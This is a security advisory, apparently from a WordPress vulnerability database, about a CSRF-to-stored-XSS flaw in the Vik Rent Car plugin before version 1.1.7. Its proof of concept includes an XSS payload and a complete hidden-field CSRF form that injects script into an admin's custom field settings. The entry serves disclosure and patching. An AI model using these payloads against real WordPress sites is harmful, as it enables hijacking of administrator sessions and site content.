WordPress Plugin Vulnerabilities
Vik Rent Car < 1.1.7 - CSRF to Stored XSS
Description
In the plugin, there is a custom filed option by which we can manage all the fields that the users will have to fill in before saving the order. However, the field name is not sanitised or escaped before being output back in the page, leading to a stored Cross-Site Scripting issue. There is also no CSRF check done before saving the setting, allowing attackers to make a logged in admin set arbitrary Custom Fields, including one with XSS payload in it.
Note: The XSS has been fixed in 1.1.6, and the CSRF in 1.1.7
Proof of Concept
Steps To produce the bug:
1. Go to the custom fields option in the plugin (/wp-admin/admin.php?option=com_vikrentcar&task=customf)
2. Edit the field and add an XSS payload in the Field Name, ie <img src=x onerror=alert(1337)>
3. Now save that and whenever anyone visit that XSS will trigger
via CSRF
<html>
<body>
<form action="https://example.com/wp-admin/admin.php" method="POST">
<input type="hidden" name="name" value="ORDER_TERMSCONDITIONS<img src onerror=alert(/XSS/)>" />
<input type="hidden" name="type" value="checkbox" />
<input type="hidden" name="choose[]" value="" />
<input type="hidden" name="required" value="1" />
<input type="hidden" name="flag" value="" />
<input type="hidden" name="poplink" value="" />
<input type="hidden" name="task" value="updatecustomf" />
<input type="hidden" name="option" value="com_vikrentcar" />
<input type="hidden" name="where" value="13" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Affects Plugins
Fixed in 1.1.7 References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Satyender Yadav
Submitter
Satyender Yadav
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-06-14 (about 2 years ago)
Added
2021-06-14 (about 2 years ago)
Last Updated
2021-06-25 (about 2 years ago)
WPScan 